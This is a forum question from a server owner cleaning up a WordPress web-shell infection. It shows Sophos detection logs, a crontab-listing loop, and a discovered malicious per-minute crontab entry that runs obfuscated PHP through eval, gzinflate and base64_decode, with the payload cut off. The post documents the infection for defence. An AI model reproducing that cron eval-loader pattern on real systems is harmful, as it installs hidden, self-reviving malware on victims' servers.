
Troj/PHPShel-CE and PHP/Agent-BJNA trojan

0 votes
2 answers
82 views
I'm currently dealing with a real threat: the trojans Troj/PHPShel-CE and PHP/Agent-BJNA showed up on my system. I've decided to move to another provider – the first server IP was already blacklisted, and I want to stop any further damage. As a first step, I disabled apache2 and blocked all incoming/outgoing ports except SSH (port 22). I'm now backing up only the important data (like .pdf, images, etc. – no .php, .exe, .com or anything executable). But I'm still confused why Sophos didn't detect the full extent of the infection. Here's what it found:

    Severity,When,Event,User,"User Groups",Device,"Device Groups","IP Address"
    Low,"2025-05-30T22:51:14+02:00","Scan 'Scan Now' completed",n/a,,mail,,xx.xx.xx.xx
    High,"2025-05-30T22:39:03+02:00","Outbreak detected",n/a,,mail,,xx.xx.xx.xx
    Medium,"2025-05-30T22:39:02+02:00","Malware detected: 'Troj/PHPShel-CE' at '/var/www/clients/client1/web7/web/wp-includes/l10n/class-wp-translation-file-security.php'",n/a,,mail,,xx.xx.xx.xx
    Low,"2025-05-30T22:38:45+02:00","Malware cleaned up: 'PHP/Agent-BJNA' at '/var/www/clients/client1/web3/web/wp-content/plugins/wpforms-lite/vendor_prefixed/apimatic/jsonmapper/tests/namespacetest/model/.1748559585'",n/a,,mail,,xx.xx.xx.xx

... and more, about 150 times.

After scanning multiple times, some of the same files were detected again – so clearly something is still active. I chatted with Claude (AI assistant), and he suggested checking all user crontabs, using this:

    echo "Checking crontabs..."
    for user in $(cut -f1 -d: /etc/passwd); do
        echo "--- Crontab for $user ---"
        crontab -u "$user" -l 2>/dev/null || echo "No crontab for $user"
    done

At first, nothing suspicious came up – but then I found something under a user called web10:

    root@mail:/usr/local/sbin# crontab -u web10 -l
    * * * * * /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJtj5pAEP7**** LOT MORE ****==")));

My question:

When we move to a new (managed) hosting provider, is there a risk that some infected files could sneak into the new system during the migration – even if we're careful and avoid transferring obvious malware like .php and .exe files?

My setup:

Ubuntu 24.04.2, apache2, php 8.3/8.4, ispconfig3
Asked by Harvey68 (1 rep)
Jun 1, 2025, 09:23 AM
Last activity: Jun 3, 2025, 08:44 AM